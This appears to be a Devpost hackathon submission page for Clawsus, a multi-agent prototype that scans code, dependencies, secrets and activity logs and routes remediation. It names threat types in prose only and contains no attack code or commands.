Clawsus

Inspiration

Agentic development tools can move quickly across code, dependencies, shell execution, and infrastructure. That speed is useful, but it also creates a larger security surface. Beyond standard risks like generated code introducing Remote Code Execution (RCE) or credentials leaking into repositories, autonomous agents introduce entirely new threat vectors.

They are highly susceptible to supply chain attacks where packages run malicious install scripts, as well as emerging prompt-injection and context-leaking vulnerabilities like the Claude Mythos exploit. Furthermore, UI-driven vulnerabilities like the Canvas hack prove that agents can be manipulated into executing unauthorized actions simply by interacting with poisoned visual or workspace environments. Without strict guardrails, automated fixes can rapidly compound these issues before a human ever notices.

Clawsus was built as a security-first enterprise agent for this exact world. The goal is to detect risk early, whether it stems from malicious code, compromised dependencies, or adversarial manipulation and route it to the right specialist agent, and keep unsafe actions behind clear policy and verification gates.

What it does

Clawsus coordinates a set of specialized cybersecurity agents:

Vulnerability Scanner: scans source code for RCE, command injection, unsafe eval/exec usage, hardcoded secrets, and other high-risk patterns.
Supply Chain Guard and Morpheus Agent: inspect dependency manifests, package sources, install scripts, typosquatting signals, and suspicious network behavior.
Secret Leak Detection: searches repositories for exposed credentials, API keys, tokens, and private key material.
Sandbox Agent: simulates execution in a restricted NemoClaw/OpenShell-style sandbox, blocks suspicious behavior, and produces a security report.
Patch & Verify Agent: applies patches on a fix branch, runs tests, commits verified fixes, and can open a pull request.
Quarantine/Rollback Agent: turns supply-chain findings into remediation actions such as quarantine, uninstall, and rollback.
Insider Threat Agent: analyzes employee activity logs for repeated failed logins, impossible travel, mass downloads, privilege escalation attempts, and unusual access spikes.
Dashboard: shows agent health, live logs, endpoints, and vulnerability reports in one operator-facing interface.

How we built it

The project is organized around lightweight Python agents and a browser-based dashboard. The security agents read source trees, dependency files, generated vulnerability reports, and activity logs. Some agents use deterministic rules for fast scanning, while others are designed to call local model endpoints compatible with OpenAI-style chat completions. The workspace includes NemoClaw/OpenClaw integration notes and a blueprint-style configuration for routing inference and sandbox behavior.

The dashboard is built with HTML, CSS, and JavaScript. It visualizes the backend agent system, shows service health, exposes the API-style endpoints, streams simulated logs, and loads JSON reports from the vulnerability and supply-chain scanners.

Challenges we ran into

The main challenge was turning a broad security idea into separate agents with clear responsibilities. Vulnerability detection, dependency scanning, sandboxing, leak detection, rollback, and patch verification all have different inputs and outputs, so the architecture had to keep each workflow simple while still making the whole system feel coordinated.

Another challenge was balancing demo clarity with realistic security behavior. We wanted the system to show concrete findings, such as command injection, eval-based RCE, malicious postinstall scripts, typosquatting, and environment variable exfiltration, without pretending that a single scanner can solve every security problem.

Accomplishments

We built a working multi-agent security prototype with real scan logic, structured JSON reports, a live dashboard, and multiple remediation paths. Clawsus can identify high-risk source patterns, flag suspicious dependency behavior, detect secret leakage patterns, simulate sandbox policy enforcement, and prepare verified patch workflows.

What we learned

The biggest lesson was that agentic security needs orchestration as much as detection. A scanner that finds a problem is useful, but an agent system becomes much more valuable when it can decide whether to quarantine, sandbox, patch, verify, alert, or escalate.

What's next

Next steps are deeper OpenClaw/NemoClaw integration, real container-backed sandbox execution, stronger model-assisted triage, authenticated repository workflows, Telegram/SOC alerting, and a production dashboard that can track continuous scans across multiple repos.

Built With

css
git
github-cli
html
javascript
json
llama.cpp-compatible-local-inference
nemoclaw
nvidia-nemotron
openai-compatible-chat-completions
openclaw
openshell
python
qwen
telegram-bot-api

Submitted to

NemoClaw NVIDIA x ASUS Hackathon @ UCSC

Created by

I created agents for detection of vulnerabilities and agents for fixing the vulnerabilities. For instance, We made agents to detect Secrets Leak, Code Vulnerabilities, and Supply Chain Attacks. The AI agents detects sensitive information left in code, unsafe buffer manipulation, unauthorized network requests etc.

Dhruv Kolte
Eva Jain
Aanya Jain
Joseph Karam

Updates

Joseph Karam started this project — May 16, 2026 08:57 PM EDT

Leave feedback in the comments!

Log in or sign up for Devpost to join the conversation.